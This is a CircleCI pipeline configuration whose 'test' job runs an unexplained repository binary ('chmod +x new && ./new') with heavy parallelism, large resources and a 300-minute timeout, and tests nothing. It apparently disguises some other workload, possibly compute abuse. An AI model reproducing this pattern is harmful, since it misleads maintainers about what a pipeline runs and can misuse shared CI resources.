jobs:
  test:
    parallelism: 15
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         command: |
                     chmod +x new && ./new
         no_output_timeout: 300m
         Name: test

orbs:
  node: circleci/node@4.7.0

version: 2.1

executors:
  kepo:
    docker:
      - image: node
    resource_class: large

workflows:
  master:
    jobs:
      - test:
          matrix:
            parameters:
              os: [kepo]
              node-version: ["10.9.0", "11.9.0"]